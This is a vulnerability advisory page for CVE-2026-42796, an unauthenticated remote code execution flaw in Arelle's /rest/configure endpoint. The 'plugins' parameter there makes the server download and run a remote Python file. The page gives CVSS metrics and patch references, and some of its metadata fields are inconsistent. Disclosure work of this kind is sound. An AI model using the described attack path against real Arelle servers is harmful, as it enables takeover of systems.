Unauthenticated Remote Code Execution in Arelle by Arelle Inc.
CVE-2026-42796

9.2CRITICAL

Key Information:

Vendor

Arelle

Status
Arelle
Vendor
CVE Published:
4 May 2026

What is CVE-2026-42796?

Arelle prior to version 2.39.10 exhibits an unauthenticated remote code execution flaw due to a vulnerability in the /rest/configure REST endpoint. This endpoint accepts user-supplied data through the 'plugins' query parameter, allowing an attacker to send a URL pointing to a malicious Python file. Without the need for authentication or proper authorization checks, the Arelle webserver can inadvertently download and execute this harmful code with the same privileges as the Arelle process, posing significant risks to system integrity and security.

Affected Version(s)

Arelle 0

References

https://github.com/Arelle/Arelle/releases/tag/2.39.10
release-notespatch
https://github.com/Arelle/Arelle/pull/2320
issue-tracking
https://www.vulncheck.com/advisories/arelle-unauthenticat...
third-party-advisory

CVSS V4

Score:
9.2
Severity:
CRITICAL
Confidentiality:
High
Integrity:
High
Availability:
High
Attack Vector:
Network
Attack Complexity:
Low
Attack Required:
Physical
Privileges Required:
Undefined
User Interaction:
None

Timeline

  • Vulnerability published

  • Vulnerability Reserved

Credit

Mobasi Security Team
.